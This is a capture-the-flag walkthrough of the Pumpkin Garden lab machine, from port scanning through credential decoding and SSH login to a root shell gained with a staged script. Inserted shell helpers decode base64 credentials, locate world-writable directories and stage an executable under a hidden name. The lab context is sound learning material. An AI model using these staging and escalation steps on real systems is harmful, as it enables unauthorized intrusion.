Pumpkin Garden is the first level of Mission-Pumpkin v1.0, which can be found here. As the author describes it, Mission-Pumpkin v1.0 is a beginner-level CTF series created with beginners in mind: it is for people who have basic knowledge of hacking tools and techniques but struggle to apply them. I believe the machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of a series of three machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to the PumpkinGarden_key file stored in the root account.
I downloaded the provided virtual machine file and imported it into VirtualBox for analysis. I used Kali Linux as the attacker machine.
- Attacker Machine: Kali Linux 192.168.0.107
- Target Machine: Pumpkin Garden 192.168.0.100
As a first step I ran an nmap (Zenmap) scan to find open ports and the associated services. Three TCP ports were open, with HTTP and SSH on non-standard ports. Service detection also reported that anonymous login to the FTP service is enabled:
- FTP 21
- HTTP 1515
- SSH 3535
Since anonymous authentication is enabled, I opened the FTP share in the browser [ftp://192.168.0.100]. It contained a text file with a message.
I then ran a Nikto scan against the HTTP service (port 1515) to find a lead. The scan flagged /img as interesting; browsing that path revealed a folder named hidden_secret, and inside it another text file with an encoded string. Decoding the string produced two strings that look like a username:password pair.
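An added helper for the decoding step, not part of the original write-up. The post does not name the encoding, so base64 is an assumption here; the function also restores the "=" padding that CTF notes often drop (GNU base64 -d refuses unpadded input), and only accepts a result that has the name:secret shape. The credential used in the usage comment is constructed, not the one from the machine.

```sh
# decode_b64_creds ENCODED
#   Base64-decodes ENCODED and prints the plaintext only if it has the
#   "name:secret" shape seen in the walkthrough; returns 1 otherwise.
#   Assumption (not stated in the post): the note used base64.
decode_b64_creds() {
    # Strip whitespace that tends to come along when the blob is copied off a page.
    blob=$(printf '%s' "$1" | tr -d ' \t\r\n')
    # CTF notes often drop the '=' padding and GNU base64 -d then rejects the
    # input, so restore it from the length (length mod 4 == 1 is never valid).
    case $(( ${#blob} % 4 )) in
        1) return 1 ;;
        2) blob="${blob}==" ;;
        3) blob="${blob}=" ;;
    esac
    plain=$(printf '%s' "$blob" | base64 -d 2>/dev/null) || return 1
    case $plain in
        *[![:print:]]*) return 1 ;;          # decoded to binary junk, not a credential
        ?*:?*) printf '%s\n' "$plain" ;;     # name:secret, the shape we are after
        *) return 1 ;;
    esac
}

# Constructed usage: decode_b64_creds "$(printf '%s' 'alice:s3cret!' | base64)"
```

If the decoded text is not printable or has no colon, nothing is printed and the exit status is 1, so the function can be chained with `||` to fall through to a different decoding attempt.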
The nmap scan had also found SSH, on port 3535. I tried to connect over SSH with the decoded username and password. Damn! It worked, and I was logged in to the target machine. Listing the files, I found another note asking me to reach out to goblin with a secret key. I tried logging in as goblin and it worked again; now I had a shell as goblin. Listing files there was denied, so I switched to the home directory, where another note pointed to a script file.
Reading the script in a text editor showed that it has to be placed in a location with write permission.
I ran this command to identify world-writable folders:
find / -perm -o+w
It returned a long list of folders, and I went ahead with /var/tmp. I used wget to download the script there and created the dummy file the script needs in order to run. wget does not set the execute bit on downloaded files, so I changed the permissions to add execute permission. After executing the script, I had a root shell.
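As an added example (not the post's own command), here is the same search refined in POSIX sh: prune the pseudo-filesystems that make the raw list so long, keep only directories, confirm the current user can really write to and traverse the candidate, and stage a script with the execute bit set. The paths and script name in the usage comment are placeholders; the test builds a constructed temp tree rather than scanning a real host.

```sh
# list_world_writable ROOT
#   Directories under ROOT that anyone may write to (-perm -0002 is the octal
#   spelling of the post's -o+w). Pseudo-filesystems are pruned and the
#   "Permission denied" noise an unprivileged user sees is silenced.
list_world_writable() {
    find "$1" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
        -type d -perm -0002 -print 2>/dev/null
}

# pick_staging_dir ROOT
#   First world-writable directory the current user can actually write to and
#   traverse; an ACL or a read-only mount can still override the mode bits.
pick_staging_dir() {
    list_world_writable "$1" | while IFS= read -r d; do
        if [ -w "$d" ] && [ -x "$d" ]; then
            printf '%s\n' "$d"
            break
        fi
    done
}

# stage_script SRC DIR
#   Copies SRC into DIR under a dot-prefixed name, sets the execute bit that a
#   wget-fetched file lacks, and prints the staged path.
stage_script() {
    dest="$2/.$(basename "$1").$$"
    cp "$1" "$dest" && chmod 700 "$dest" && printf '%s\n' "$dest"
}

# Placeholder usage on the target:
#   dir=$(pick_staging_dir /)
#   staged=$(stage_script ./script.sh "$dir") && "$staged"
```

One caveat the mode bits do not show: if the chosen directory sits on a mount with noexec (a common hardening for /tmp and /var/tmp), the execute bit is ignored and the script has to be handed to its interpreter explicitly (`sh "$staged"`) instead of being run directly.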
I navigated to the home folder and found the key as an encoded string. Decoding the key revealed the message I had been waiting for since the start of this exercise: "Congratulations".
nmap and Nikto were enough to get me to the secret script and on to the pumpkin key. I am still unsure about the clue in the FTP folder, as I did not use it anywhere in this exercise. Or was Jack the person who hosted the HTTP service and gave away the SSH access?